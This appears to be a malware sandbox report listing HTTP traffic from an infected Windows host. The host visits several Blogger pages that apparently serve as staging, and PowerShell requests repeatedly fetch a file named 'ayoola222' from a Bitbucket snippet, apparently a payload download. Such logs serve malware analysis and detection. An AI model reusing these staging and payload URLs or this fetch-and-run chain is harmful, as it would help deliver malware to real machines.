Source: global traffic HTTP traffic detected: GET /s/roboto/v27/KFOmCnqEu92Fr1Mu4mxO.eot HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: fonts.gstatic.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p/ayoola.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: randikhanaekminar.blogspot.com
Source: global traffic HTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=4778963473423104316&zx=f202e5b7-10a8-4731-a0ba-0a7b50381b0c HTTP/1.1Accept: */*Referer: https://randikhanaekminar.blogspot.com/p/ayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /js/cookienotice.js HTTP/1.1Accept: */*Referer: https://randikhanaekminar.blogspot.com/p/ayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: randikhanaekminar.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https://randikhanaekminar.blogspot.com/p/ayoola.html&type=blog HTTP/1.1Accept: */*Referer: https://randikhanaekminar.blogspot.com/p/ayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://randikhanaekminar.blogspot.com/p/ayoola.html%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://randikhanaekminar.blogspot.com/p/ayoola.html%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://randikhanaekminar.blogspot.com/p/ayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: accounts.google.comCookie: __Host-GAPS=1:c9BBumwINGgbKZmhvCsmcJwIqGnQ7A:dvQQZbHicFDLQc5k
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Frandikhanaekminar.blogspot.com%2Fp%2Fayoola.html&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://randikhanaekminar.blogspot.com/p/ayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.blogger.comCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /css/maia.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Frandikhanaekminar.blogspot.com%2Fp%2Fayoola.html&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google.comIf-Modified-Since: Mon, 25 May 2020 08:30:00 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /analytics.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Frandikhanaekminar.blogspot.com%2Fp%2Fayoola.html&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google-analytics.comIf-Modified-Since: Wed, 11 Aug 2021 00:32:57 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: bitbucket.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p/ayoolaback.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: backbones1234511a.blogspot.com
Source: global traffic HTTP traffic detected: GET /js/cookienotice.js HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: backbones1234511a.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=7680886694920034828&zx=ad70dca0-0e6f-4ddf-9917-2cf3a06acb70 HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https://backbones1234511a.blogspot.com/p/ayoolaback.html%2522&type=blog HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://backbones1234511a.blogspot.com/p/ayoolaback.html%252522%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://backbones1234511a.blogspot.com/p/ayoolaback.html%252522%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: accounts.google.comCookie: __Host-GAPS=1:6n9HeR7EpH_BLBfBK28oPhchLN3ckw:TftEdtH5NeRlJzNf
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fbackbones1234511a.blogspot.com%2Fp%2Fayoolaback.html%2522&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.blogger.comCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: bitbucket.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /css/maia.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fbackbones1234511a.blogspot.com%2Fp%2Fayoolaback.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google.comIf-Modified-Since: Mon, 25 May 2020 08:30:00 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /analytics.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fbackbones1234511a.blogspot.com%2Fp%2Fayoolaback.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google-analytics.comIf-Modified-Since: Wed, 11 Aug 2021 00:32:57 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p/backbone16.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: startthepartyup.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /js/cookienotice.js HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: startthepartyup.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=9027821174359424672&zx=2c5db057-0ce4-4fb6-885f-019691b40909 HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https://startthepartyup.blogspot.com/p/backbone16.html%2522&type=blog HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://startthepartyup.blogspot.com/p/backbone16.html%252522%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://startthepartyup.blogspot.com/p/backbone16.html%252522%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: accounts.google.comCookie: __Host-GAPS=1:-UtK03aR6xcHYC2IsubUGy9SL5c4yw:nFWAkb4XQpFiUmZt
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fstartthepartyup.blogspot.com%2Fp%2Fbackbone16.html%2522&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.blogger.comCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /css/maia.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fstartthepartyup.blogspot.com%2Fp%2Fbackbone16.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google.comIf-Modified-Since: Mon, 25 May 2020 08:30:00 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /analytics.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fstartthepartyup.blogspot.com%2Fp%2Fbackbone16.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google-analytics.comIf-Modified-Since: Wed, 11 Aug 2021 00:32:57 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p/ghostbackup15.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: ghostbackbone123.blogspot.com
Source: global traffic HTTP traffic detected: GET /js/cookienotice.js HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ghostbackbone123.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=1690726786805467605&zx=1fe0aef2-8b4f-4693-89a0-5b335e695da7 HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%2522&type=blog HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://ghostbackbone123.blogspot.com/p/ghostbackup15.html%252522%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://ghostbackbone123.blogspot.com/p/ghostbackup15.html%252522%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: accounts.google.comCookie: __Host-GAPS=1:5Vg_RjDpt6AvPfyva6KZpJ4lF9qr6w:sp4m46I6qe_hSWA8
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fghostbackbone123.blogspot.com%2Fp%2Fghostbackup15.html%2522&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.blogger.comCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /css/maia.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fghostbackbone123.blogspot.com%2Fp%2Fghostbackup15.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google.comIf-Modified-Since: Mon, 25 May 2020 08:30:00 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /analytics.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fghostbackbone123.blogspot.com%2Fp%2Fghostbackup15.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google-analytics.comIf-Modified-Since: Wed, 11 Aug 2021 00:32:57 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: bitbucket.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p/ayoolaback.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: backbones1234511a.blogspot.com
Source: global traffic HTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=7680886694920034828&zx=ad70dca0-0e6f-4ddf-9917-2cf3a06acb70 HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https://backbones1234511a.blogspot.com/p/ayoolaback.html%2522&type=blog HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /p/backbone16.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: startthepartyup.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://backbones1234511a.blogspot.com/p/ayoolaback.html%252522%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://backbones1234511a.blogspot.com/p/ayoolaback.html%252522%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: accounts.google.comCookie: __Host-GAPS=1:Hmt6ODuT1T9rHnbQAYn_Kn4-RIPtxg:emLdUalzCJuXb2hK
Source: global traffic HTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=9027821174359424672&zx=2c5db057-0ce4-4fb6-885f-019691b40909 HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fbackbones1234511a.blogspot.com%2Fp%2Fayoolaback.html%2522&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.blogger.comCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https://startthepartyup.blogspot.com/p/backbone16.html%2522&type=blog HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://startthepartyup.blogspot.com/p/backbone16.html%252522%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://startthepartyup.blogspot.com/p/backbone16.html%252522%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: accounts.google.comCookie: __Host-GAPS=1:bo4Rzlac7OC6SQzizPuNFmoxcxmpHg:LWMGlJqI2wYq8ec8
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fstartthepartyup.blogspot.com%2Fp%2Fbackbone16.html%2522&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.blogger.comCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
